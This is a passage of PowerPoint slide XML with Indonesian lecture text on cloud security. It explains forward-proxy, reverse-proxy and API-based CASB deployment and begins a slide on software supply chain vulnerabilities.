              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Proksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Reverse proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diposisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (API)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih-alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejajar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjembatani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> API-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di sana juga. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada API yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CASB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Solusi CASB sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode proxy dan API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297839461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Rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pasokan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
